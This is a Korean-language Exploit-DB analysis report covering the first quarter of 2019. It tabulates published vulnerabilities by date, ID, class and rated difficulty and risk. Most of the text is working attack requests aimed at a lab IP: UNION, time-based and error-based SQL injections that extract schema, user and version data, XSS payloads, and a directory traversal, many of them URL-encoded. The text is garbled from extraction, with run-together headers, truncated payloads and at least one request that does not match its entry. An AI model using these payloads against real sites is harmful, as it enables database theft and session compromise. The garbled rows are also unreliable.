GET/10.0.100.24/index.php?option=com_jbusinessdirectory&task=categories.getCategories&type=1%20union%20select%20(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2--%20-&term=a HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad6; PHPSESSID=c1088ee33a3f4770dd333f9605b9e44f;704a7cf3f453ec2db97de2f28ef169f8=fb9a121113ff0e6cc6da546a82f2452e
DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1Cache-Control: max-age=0
Joomla! Component
Joomla!Component J-BusinessDirectory 4.9.7
2019-01-23 46231 SQL Injection 중 하
Joomla! Component J-
ClassifiedsManager 3.0.5 - SQL
Injection
POST /10.0.100.24/component/jclassifiedsmanager/ HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 779
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;79a1b3ae870a3fab009030106c9fb887=eeab77f1b87057d5ad12b61071048ad
6DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
searchKeyword=&categorySearch=&adType=&citySearch=1'%7c%7c%28%53%45%4c%45%43%54%20%27%45%66%65%27%20%46%52%4f%4d%20%44%55%41%4c%20%57%48%45%52%452%3d%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29,%56%45%52%53%49%4f%4e%....59%20%78%29%61%29%29%7c%7c%27&option=com_jclassifiedsmanager&controller=displayads&task=searchAds&view=displayads
Joomla! Component
Joomla!
Component J-ClassifiedsMa
nager 3.0.5
2019-01-23 46232 SQL Injection 하 하
Joomla! Component
JMultipleHotelReservation 6.0.7
- SQL Injection
POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 985Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991;PHPSESSID=6c6c795380ae5a25888e1dd57e04320a;c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x:
=0x00)%2c(@rUNNing_nuMBer
Joomla! Component
Joomla!Component
JMultipleHotelReservation
6.0.7
2019-01-24 46233 SQL Injection 중 하
Joomla! Component J-
CruisePortal 6.0.4 - SQL
Injection
POST /10.0.100.24/cruises/cruises HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 518Connection: keep-aliveUpgrade-Insecure-Requests: 1
controller=search&task=searchCruises&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&cruise_id=&day_end=24&rooms=1&guest_adult=2%20%20%2f%2a%21%31%31%31%31%31%61%6e%44%2a%2f%20%73%6c%65%65%70%28%35%29&guest_child=0&filterParams=&resetSearch=1&searchType=&searchId=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=&jcruisereservation_datas=01%2F23%2F2019&jcruisereservation_datae=01%2F24%2F2019&jcruisereservation_rooms=1&jcruisereservation_guest_adult=2&jcruisereservation_guest_child=0: undefined
Joomla! Component
Joomla!Component J-CruisePortal
6.0.4
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-24 46234 SQL Injection 중 중
Joomla! Component
JHotelReservation 6.0.7 - SQL
Injection
POST /10.0.100.24/j-myhotel/search-hotels?view=hotels HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateAlt-Used: TARGET:443Connection: keep-aliveContent-Tye: application/x-www-form-urlencodedContent-Length: 965
task=hotels.searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=1%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%3
1%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%
2c%31%32%2c%31%......33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%3
3%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d&guest_adult=2&guest_child=0&filterParams=facilityId%3D1&resetSearch=0'&searchType=&searchId=&priceLow=&priceHigh=&room-guests%5B%5D=2&room-guests-children%5B%5D=0&keyword=Paris&jhotelreservation_datas=23-01-2019&jhotelreservation_datae=24-01-2019&jhotelreservation_rooms=1&jhotelreservation_guest_adult=2&jhotelreservation_guest_child=0
Joomla! Component
Joomla!Component
JHotelReservation 6.0.7
2019-01-24 46235 SQL Injection 하 중SimplePress CMS 1.0.7 - SQL
Injection
GET/10.0.100.24/?p=%2d%31%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29,(%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%29%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: NO_CACHE=1; CAKEPHP=72i3s18s3sk0mn2c63gi0pikq0;PHPSESSID=i9sb2qgkcblm5l47uv4d3h2vm1DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
SimplePress CMSSimplePress
CMS 1.0.7
2019-01-24 46237 XSS 하 하SirsiDynix e-Library 3.5.x -
Cross-Site Scripting
POST/10.0.100.24/uhtbin/cgisirsi/?ps=0Sk8zSpD0f/MAIN/33660028/123HTTP/1.1Host: 10.0.100.24:1004
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 197
searchdata1=test&srchfield1=AU%5EAUTHOR%5EAUTHORS%5EAuthor+Processing%5EYazar&library=VLK&srch_history=--%C3%96nceki+soruyu+se%C3%A7--&sort_by=ANYhadvi%22%3e%3cscript%3ealert(1)%3c%2fscript%3eox0ix
SirsiDynix e-Library
SirsiDynix e-Library 3.5.x
2019-01-24 46239 SQL Injection 하 하ImpressCMS 1.3.11 - 'bid' SQL
Injection
POST /10.0.100.24/impress/modules/system/admin.php?bid=12HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 70
DNT: 1Connection: keep-alive
Upgrade-Insecure-Requests: 1
bid=12') AND SLEEP(5) AND('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==
ImpressCMSImpressCMS1.3.11
2019-01-25 46244 SQL Injection 중 중 GreenCMS 2.x - SQL Injection
GET/10.0.100.24/index.php?m=admin&c=posts&a=index&cat=1%27))%20AND%201=BENCHMARK(100000000,MD5(0x456665))--%20- HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1
GreenCMS GreenCMS 2.x
2019-01-28 46259 SQL Injection 하 하CMSsite 1.0 - 'cat_id' SQL
Injection
POST /10.0.100.24/cm/category.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 52
cat_id=7 UNION SELECT 1,2,user(),3,4,5,6,7,8,9,10%23
CMSsite CMSsite 1.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-28 46266 SQL Injection 하 하Newsbull Haber Script 1.0.0 -
'search' SQL Injection
POST /10.0.100.24/admin/comment/records? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 64
userId=1&search=-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Newsbull HaberScript
NewsbullHaber Script
1.0.0
2019-01-28 46268 SQL Injection 하 하
Care2x 2.7 (HIS) Hospital
Information System - Multiple
SQL Injection
GET /10.0.100.24/main/login.php?ntid=false&lang=en HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14;rv:64.0) Gecko/20100101 Firefox/64.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://192.168.0.108/main/indexframe.php?boot=1&mask=&lang=en&cookie=&sid=6fclqapl9gsjhrcgoh3q0la5spConnection: close
Cookie: sid=6fclqapl9gsjhrcgoh3q0la5sp;ck_sid6fclqapl9gsjhrcgoh3q0la5sp=m14AAA%3D%3D%23WVUYpUnF%2Fo28ZWY45A5Sh9HMvr%2FZ8wVabFY%3D;ck_config=CFG5c414492459f90.28518700%201547781266Upgrade-Insecure-Requests: 1
HospitalInformation System
Care2x 2.7(HIS)
HospitalInformation
System
2019-01-28 46270 SQL Injection 하 하Teameyo Project Management
System 1.0 - SQL Injection
GET /10.0.100.24/messages.php?project_id=-48%27%20union%20select%20(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rU
NNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brCookie: PHPSESSID=1ug6oq40f09kft3jqncc4pco71DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Teameyo ProjectManagement System
TeameyoProject
ManagementSystem 1.0
2019-01-28 46271 SQL Injection 하 하Mess Management System 1.0
- SQL Injection
GET
/10.0.100.24/index.php?mod=admin&pg=admin_form&id=%2d%31%27%20%7
5%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=6bpo344k5sbed3vd2lc6tlgh80DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Mess ManagementSystem
MessManagementSystem 1.0
2019-01-28 46273 XSS 하 하MyBB IP History Logs Plugin
1.0.2 - Cross-Site Scripting
POST /10.0.100.24/admin/index.php?module=tools-ip_history_logsHTTP/1.1Host: 10.0.100.24:1004Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencodedContent-Length: 40
User-Agent=<script>alert('XSS')</script>
MyBB IP HistoryLogs Plugin
MyBB IPHistory LogsPlugin 1.0.2
2019-02-04 46316 XSS 하 하pfSense 2.4.4-p1 - Cross-Site
Scripting
POST /10.0.100.24/system_advanced_admin.php HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://target/uhtbin/cgisirsi/?ps=mmRoXTc0L3/MAIN/33660028/38/1/
X/BLASTOFFConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 40
webguiproto="><script>alert(1)</script>
pfSensepfSense
2.4.4-p1
2019-02-04 46315 XSS 하 하Nessus 8.2.1 - Cross-Site
Scripting
POST /10.0.100.24/policies HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467
DNT: 1Connection: close
value=\"><script>alert(1)</script>
Nessus Nessus 8.2.1
2019-02-04 46311 SQL Injection 하 하SuiteCRM 7.10.7 - 'record' SQL
Injection
GET/10.0.100.24/SuiteCRM/index.php?module=Users&action=DetailView&record=1aNd if(length(0x454d49524f474c55)>1,sleep(5),0) HTTP/1.1
SuiteCRMSuiteCRM7.10.7
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-02-04 46310 SQL Injection 하 하SuiteCRM 7.10.7 - 'parentTab'
SQL Injection
GET/10.0.100.24/SuiteCRM/index.php?module=Emails&action=index&parentTab=99999999%27)/**/oR/**/6617279=6617279/**/aNd/**/(%276199%27)=(%276199 HTTP/1.1
SuiteCRMSuiteCRM7.10.7
2019-02-04 46308 SQL Injection 하 하
ResourceSpace 8.6 -
'watched_searches.php' SQL
Injection
GET/10.0.100.24/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510 HTTP/1.1
ResourceSpaceResourceSpace
8.6
2019-02-06 46330 SQL Injection 하 하osCommerce 2.3.4.1 -
'reviews_id' SQL Injection
GET/10.0.100.24/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193 HTTP/1.1
osCommerceosCommerce2.3.4.1
2019-02-06 46329 SQL Injection 하 하osCommerce 2.3.4.1 -
'products_id' SQL Injection
GET/10.0.100.24/oscommerce/catalog/product_info.php?products_id=999
99999oR 1811160=1811160 aNd 7193=7193 HTTP/1.1
osCommerceosCommerce
2.3.4.1
2019-02-06 46328 SQL Injection 하 하osCommerce 2.3.4.1 - 'currency'
SQL Injection
GET/10.0.100.24/oscommerce/catalog/shopping_cart.php?currency=99999999%27oR 3620772=3620772 aNd %276199%27=%2761993 HTTP/1.1
osCommerceosCommerce2.3.4.1
2019-02-11 46350 SQL Injection 중 중Webiness Inventory 2.3 -
'email' SQL Injection
POST /10.0.100.24/webiness/index.php?request=Wsauth/login/HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)
AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36
--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="email"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FL
OOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="password"
--54a535315dda429db2f07895827ff1c6--
Webiness Inventory2.3
WebinessInventory 2.3
2019-02-11 46349 XSS 하 하CentOS Web Panel 0.9.8.763 -
Persistent Cross-Site Scripting
POST /10.0.100.24/policies HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0
Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close
Package Name=<script>alert(1)</script>
CentOS Web PanelCentOS Web
Panel0.9.8.763
2019-02-11 46344 XSS 중 하 IPFire 2.21 - Cross-Site Scripting
POST /10.0.100.24/cgi-bin/mail.cgi HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate
Referer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close
txt_mailsender='"><script>alert(1)</script>txt_recipient='><script>alert(2)</script>txt_mailserver='><script>alert(3)</script>txt_mailport='><script>alert(4)</script>txt_mailuser='><script>alert(5)</script>txt_mailpass='><script>alert(6)</script>PROXY_PORT='><script>alert(7)</script>TRANSPARENT_PORT='><script>alert(8)</script>
UPSTREAM_PROXY='><script>alert(9)</script>UPSTREAM_USER='><script>alert(10)</script>UPSTREAM_PASSWORD='><script>alert(11)</script>FILEDESCRIPTORS='><script>alert(12)</script>CACHE_MEM='><script>alert(13)</script>
CACHE_SIZE='><script>alert(14)</script>
IPFire IPFire 2.21
2019-02-11 46333 XSS 하 하Smoothwall Express 3.1-SP4 -
Cross-Site Scripting
POST /10.0.100.24/cgi-bin/proxy.cgi? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close
CACHE_SIZE='><script>alert(1)</script>MAX_SIZE='><script>alert(2)</script>MIN_SIZE='><script>alert(3)</script>
MAX_OUTGOING_SIZE='><script>alert(4)</script>
MAX_INCOMING_SIZE='><script>alert(5)</script>REDIRECT_PAGE='><script>alert(6)</script>
Smoothwall ExpressSmoothwallExpress 3.1-
SP4
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-02-12 46353 Directory Traversal 하 하BlogEngine.NET 3.3.6 -
Directory Traversal
GET /?theme=../../App_Data/files HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
BlogEngine.NETBlogEngine.NE
T 3.3.6
2019-02-12 46351 XSS 하 하OPNsense < 19.1.1 - Cross-Site
Scripting
POST /10.0.100.24/diag_backup.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*
Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost:8834/Content-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close
GDrive_GDriveEmail="><script>alert(1)</script>GDrive_GDriveFolderID="><script>alert(2)</script>GDrive_GDriveBackupCount="><script>alert(3)</script>Nextcloud_url="><script>alert(4)</script>Nextcloud_user="><script>alert(5)</script>Nextcloud_password="><script>alert(6)</script>Nextcloud_password_encryption="><script>alert(7)</script>
OPNsenseOPNsense <19.1.1
2019-02-13 46368 SQL Injection 하 중PilusCart 1.4.1 - 'send' SQL
Injection
POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&toke
n=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5
Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)
AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36
--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="email"-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CH
AR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'--54a535315dda429db2f07895827ff1c6Content-Disposition: form-data; name="password"--54a535315dda429db2f07895827ff1c6--
PilusCartPilusCart1.4.1
2019-02-13 46366 XSS 하 하
Rukovoditel Project
Management CRM 2.4.1 -
Cross-Site Scripting
GET /10.0.100.24/index.php?module=users%2flogin HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close
RukovoditelProject Management
CRM
RukovoditelProject
ManagementCRM 2.4.1
2019-02-14 46377 SQL Injection 하 중
WordPress Plugin Booking
Calendar 8.4.3 - Authenticated
SQL Injection
POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND
(1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67
WordPress PluginBooking Calendar
WordPressPlugin
BookingCalendar8.4.3
2019-02-14 46375 XSS 하 하
DomainMOD 4.11.01 -
'assets/add/dns.php' Cross-Site
Scripting
Profile Name="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>notes="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>
DomainMODDomainMOD4.11.01
2019-02-14 46374 XSS 하 하
DomainMOD 4.11.01 -
'category.php CatagoryName,
StakeHolder' Cross-Site
Scripting
CatagoryName="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>StakeHolder="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>
DomainMODDomainMOD4.11.01
2019-02-14 46373 XSS 하 하
DomainMOD 4.11.01 - 'ssl-
accounts.php username' Cross-
Site Scripting
username="><img src=xonerror=alert("Xss-By-Abdul-Raheem")> DomainMODDomainMOD4.11.01
2019-02-14 46372 XSS 하 하
DomainMOD 4.11.01 - 'ssl-
provider-name' Cross-Site
Scripting
ssl-provider-name="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>ssl-provider's-url="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
DomainMODDomainMOD4.11.01
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
